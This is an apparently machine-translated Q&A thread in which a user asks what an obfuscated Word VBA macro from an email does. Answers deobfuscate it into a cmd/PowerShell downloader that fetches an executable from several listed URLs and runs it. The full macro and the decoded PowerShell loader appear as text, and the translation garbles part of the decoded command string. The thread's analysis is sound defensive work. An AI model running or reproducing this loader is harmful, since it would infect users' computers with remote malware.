Pertanyaan Apa yang dilakukan kode Visual Basic ini? Makro kata Microsoft


Saya menerima email dengan dokumen kata yang memiliki beberapa makro bawaan. Saya menonaktifkan mereka dan memeriksanya. Semua kode tampak seperti omong kosong, tetapi mungkin orang lain dapat membantu saya mengetahui apa yang dilakukannya?

Ini adalah objek kata Microsoft:

Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "zFpiVaXZHXwfhz" + "U" + "2692" + "Zt"
   Second "uqwSRYVhz" + "387021345" + "kzB" + "8730"
   Second "kz" + "1499" + "tkAh" + "p"
   Second "P" + "8389"
   Second "4180" + "jmCmdHzM" + "IcRbPsSnK" + "bWtnR"
   Second "357881955" + "3117" + "ijHmwpiFZCcjw" + "bvt"
Shell KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)
   Second "pqENJzbA" + "208599822" + "Ovav" + "A"
   Second "HmjZtUmz" + "7073"
   Second "hYRErMnn" + "4277"
End Sub

Ini ada di Modul:

Function KlXaMrm()

On _
Error _
Resume _
Next
Second "IVozFsCNdj" + "muE"
   Second "wwrMmsOX" + "ii"
   Second "7048" + "RLBLOvif"
   Second "315289259" + "bGl" + "wcZUd" + "8842"
bkzhl = Format(Chr(9 + 16 + 4 + 2 + 68)) + "md /V" + "^:O/" + Format(Chr(6 + 11 + 3 + 1 + 46)) + Format(Chr(3 + 5 + 1 + 0 + 25)) + "^" + "s^" + "e^" + "t ^WvU^" + "y=^  " + " ^  ^ " + "^   " + "^   ^ "
Second "IWV" + "FalMBYmN" + "6772" + "vIi"
   Second "BfMwfQziXwj" + "fvQGQha"
   Second "hBcrV" + "380436099"
ipaSHnJ = " " + "^ ^ ^ " + "}" + "}" + "^{" + "^h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^" + "ta" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "};" + "^k^a^"
Second "31392559" + "BMS"
kVaBhn = "e" + "r^b;Yu" + "r^$ " + "^m^e^tI" + "^-e" + "k" + "o" + "vnI^;"
Second "965" + "5880" + "XJTdjHJSV" + "Abrh"
HzutiHjFO = ")Y^u" + "r^" + "$ ^,^pN" + "B^" + "$" + "(^eliF" + "d"
Second "E" + "5438"
   Second "MhjZXFtjz" + "52832268"
zBPwbjSP = "^a" + "^olnwoD" + ".j^" + "p^X$^{^" + "yr"
Second "oWcn" + "1454"
   Second "UmZTRVGRUadD" + "7070" + "Hb" + "Z"
   Second "GiNa" + "EjiBfz"
   Second "ZLiR" + "iSRc" + "LaHCfQjrI" + "467392171"
   Second "376971481" + "ATq"
wZvZZZCL = "^t{" + ")" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi$^" + " n^i" + "^" + " ^pN" + "B^$(h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^a" + "^e" + "r^o^f^;" + "'" + "^e^x^e"
Second "1426" + "2730" + "131359904" + "2661"
   Second "tZ" + "A"
FVkwvLXivOm = "^.^'+^f" + "aw" + "^$+" + "'\'^+" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "i^" + "l" + "^" + "b^u^p:v"
Second "obmhCVWdl" + "1876"
LEFDwJt = "n" + "e^$^=Y" + "^ur^$;'" + "^1^" + "1^7" + "^' =^ " + "f^aw$;" + ")^'@^" + "'(" + "t" + "ilp^S.^"
Second "mHz" + "2845" + "swVQqO" + "sTaM"
   Second "151506295" + "9519"
   Second "530531760" + "421003665" + "33902179" + "zE"
UjhKfLskOAw = "'^" + "D^GoP/" + "m" + "^o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "^t"
Second "1424" + "AS" + "qWRt" + "jTfL"
   Second "144" + "385570591" + "YNItdvcRQLGKl" + "273801574"
   Second "8474" + "427918883" + "101014623" + "2181"
oHsEGJKpH = "^o" + "^p^" + "sno" + "r^i" + "//:p^t" + "t^h^@j" + "fW^FVF^" + "8r/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "e^u" + "v" + "^"
Second "LIdEK" + "9208"
   Second "GHY" + "w"
   Second "licB" + "57965560" + "BkiEX" + "uNEQdXXBb"
wIVBCzu = "ero^o^" + "b" + "a^keep" + "/" + "/^:^p^"
KlXaMrm = bkzhl + ipaSHnJ + kVaBhn + HzutiHjFO + zBPwbjSP + wZvZZZCL + FVkwvLXivOm + LEFDwJt + UjhKfLskOAw + oHsEGJKpH + wIVBCzu
   Second "kmpQXLAuN" + "fh" + "365194270" + "n"
   Second "70996280" + "nJ"
   Second "QTviGhI" + "RV" + "315865801" + "UcJFQ"
End Function
Function bMdNCkVCVn()

On _
Error _
Resume _
Next
Second "FddKlw" + "OTSBodYZZ"
PpRpwRnf = "tth^" + "@uj^l^" + "h^o" + "/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.^" + "gn" + "^it" + "nia^p"
Second "wCkfREKOG" + "AfRUmpAd" + "WL" + "GICb"
   Second "rBzjjYzi" + "zL"
LOkOMzwwZEb = "m^ot^su" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ra" + "^" + "t^sen^" + "o" + "^l//^:" + "p^t^t" + "h"
Second "rlTmjU" + "jYwjHViv" + "dqjiW" + "c"
   Second "WHUDRQuddUoQr" + "lIcDDYCTjsUVWs" + "4956" + "mJ"
   Second "9262" + "171867944" + "464524065" + "7760"
WnITU = "^@u^A" + "/^ur.^m" + "b^s-t" + "^evs^" + "s" + "^ar" + "//^:p^t" + "th" + "@^F^p2G" + "^zx^W/^"
Second "184947357" + "wjOV"
   Second "5399" + "jwuBT"
   Second "402560265" + "449" + "l" + "BBBuHZnMK"
   Second "MrA" + "nMwkzNbY" + "429759967" + "bqC"
WsfkNBcA = "mo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.k" + "ro" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ege" + "l^lo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "sn" + "i" + "^t" + "r^a^mt^" + "s//" + ":p" + "^t" + "^"
Second "534498195" + "HX" + "vwKkqLAvKmm" + "279702571"
   Second "KYJPBi" + "ivTUzZOfj" + "162850888" + "WbZ"
RqVln = "th'^=" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi^$" + ";^" + "t" + "n^e^i" + "^l" + Format(Chr(6 + 11 + 3 + 1 + 46)) + "be^W" + "^.t^e" + "N^ t" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ejb^o" + "-^w^e" + "n=" + "^j" + "pX^"
Second "fbvS" + "F"
   Second "BmJt" + "Y"
   Second "z" + "qlRwULuPK" + "NE" + "2370"
   Second "467432993" + "510382039" + "V" + "357745589"
TTWnMmnb = "$ ll^e" + "h^s" + "r^e^w^" + "o^p" + "&&" + "^f^o"
Second "FQvcEKz" + "IN" + "419878734" + "aWRD"
   Second "Gs" + "qiWjuwsKkDzj"
   Second "w" + "iZv" + "ri" + "jbl"
HuAjss = "r /L" + " %^5" + " ^" + "in (^" + "37" + "^3,-" + "^1,^0)^" + "do s^e^" + "t" + " 3^1=!3"
Second "IIz" + "pwb" + "OiIRoWEPKvRSu" + "fLYzMV"
   Second "I" + "5470" + "uC" + "vzYpG"
   Second "Prm" + "D"
vWYHrcNLA = "^" + "1!!" + "^WvU^y" + ":~%^5" + ",1!&" + "&i" + "^" + "f %^5" + "=^=^0" + " " + Format(Chr(9 + 16 + 4 + 2 + 68)) + "a^l^l"
Second "QqFfMn" + "mmslG"
fGbIAE = " " + "%3^1:" + "*^" + "3^1^" + "!^"
bMdNCkVCVn = PpRpwRnf + LOkOMzwwZEb + WnITU + WsfkNBcA + RqVln + TTWnMmnb + HuAjss + vWYHrcNLA + fGbIAE
   Second "kWluI" + "lFK"
   Second "FoYWtEQUo" + "SPqoT" + "m" + "1515"
   Second "QHGQ" + "f"
End Function
Function zZZwVld()

On _
Error _
Resume _
Next
Second "15045220" + "Cfku" + "finOQwh" + "mUISHvGpDwIp"
   Second "297480629" + "wXWqc"
   Second "RJ" + "1178" + "XfKGfw" + "znaVlIj"
sFjEfzuO = "=%" + Format(Chr(3 + 5 + 1 + 0 + 25)) + "  " + ""
zZZwVld = sFjEfzuO
   Second "7008" + "530276898"
End Function

Saya menduga ini berbahaya, tapi saya tidak terlalu akrab dengan Visual Basic. Saya juga tidak yakin apakah ini adalah tempat yang tepat untuk bertanya tentang hal ini.


4
2017-09-10 10:56


asal


Jawaban:


Semua garis yang dimulai dengan Second adalah noise yang menyebabkan kesalahan runtime dan tidak melakukan apa-apa. Mereka hanya ada untuk membingungkan antivirus.

Jika Anda menghapus semuanya, Anda akan memiliki banyak tugas string. Mereka semua menambahkan hingga string berikut pada akhirnya:

cmd / V ^: O / C "^ s ^ e ^ t ^ WvU ^ y = ^ ^ ^ ^ ^ ^ ^ ^ ^}} ^ {^ hc ^ tac}; ^ k ^ a ^ er ^ b; Yur ^ $ ^ m ^ e ^ tI ^ -ekovnI ^;) Y ^ ur ^ $ ^, ^ pNB ^ $ (^ eliFd ^ a ^ olnwoD.j ^ p ^ X $ ^ {^ yr ^ t {) c ^ oi $ ^ n ^ i ^ ^ pNB ^ $ (hc ^ a ^ er ^ o ^ f ^; '^ e ^ x ^ e ^. ^' + ^ faw ^ $ + '\' ^ + ci ^ l ^ b ^ u ^ p: vne ^ $ ^ = Y ^ ur ^ $; '^ 1 ^ 1 ^ 7 ^' = ^ f ^ aw $;) ^ '@ ^' (tilp ^ S. ^ '^ D ^ GoP / m ^ oc. ^ t ^ o ^ p ^ snor ^ i //: p^tt^h^@jfW^FVF^8r/m^oc.e^uv^ero^o^ba^keep // ^: ^ p ^ tth ^ @ uj ^ l ^ h ^ o / m ^ oc ^. ^ gn ^ itnia ^ pm ^ ot ^ sucra ^ t ^ sen ^ o ^ l // ^: p ^ t ^ th ^ @ u ^ A / ^ ur. ^ mb ^ st ^ evs ^ s ^ ar // ^: p^tth@^F^p2G^zx^W/^moc^.krocegel^locsni^tr^a^mt^s //: p ^ t ^ th '^ = c ^ oi ^ $; ^ tn ^ e ^ i ^ lCbe ^ W ^ .t ^ eN ^ tcejb ^ o- ^ w ^ en = ^ jpX ^ $ ll ^ eh ^ sr ^ e ^ w ^ o ^ p && ^ f ^ atau / L% ^ 5 ^ di (^ 37 ^ 3, - ^ 1, ^ 0) ^ lakukan s ^ e ^ t 3 ^ 1 =! 3 ^ 1 !! ^ WvU ^ y: ~ % ^ 5,1! && i ^ f% ^ 5 = ^ = ^ 0 ca ^ l ^ l% 3 ^ 1: * ^ 3 ^ 1 ^! ^ =% " 

Ini adalah perintah shell yang berjalan cmd dengan switch /V:O dan /C:"<obfuscated command>".
Semua tanda dapat dihapus dari itu, karena semua yang mereka lakukan adalah instruksi cmd untuk memperlakukan karakter berikutnya secara harfiah.

Perintah yang dikaburkan menyimpan skrip Powershell terbalik dalam sebuah variabel, membalikkannya kembali saat runtime dan diluncurkan.

Script Powershell yang akhirnya dieksekusi adalah:

$Xpj=new-object Net.WebClient;
$ioc='http://stmartinscollegecork.com/WxzG2pF@http://rassvet-sbm.ru/Au@http://lonestarcustompainting.com/ohlju@http://peekaboorevue.com/r8FVFWfj@http://ironspot.com/PoGD'.Split('@');
$waf='711';
$ruY=$env:public + '\' + $waf + '.exe';
foreach($BNp in $ioc) {
    try {
        $Xpj.DownloadFile($BNp, $ruY);
        Invoke-Item $ruY;
        break;
    }catch{}
}

Ini mencoba untuk mengunduh file dari masing-masing url yang ditentukan, menyimpannya ke dalam folder publik sebagai 711.exe dan jalankan. Ini berhenti pada lari pertama yang berhasil.


3
2017-09-10 12:43



Hapus!

Kode diaktifkan, setiap kali Anda membuka dokumen Anda. Sepertinya semacam virus memang. Itu jahat. Jika Anda ingin melihat apa yang dilakukannya, ganti baris berikut:

Shell KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)

dengan:

MsgBox KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide) 

dan lihat MsgBox(). Atau lebih baik hapus saja, mungkin ada beberapa kode lain di tempat lain, yang memanggil beberapa Shell perintah juga. Dan kemudian Anda mungkin harus menginstal ulang PC Anda.


3
2017-09-10 11:53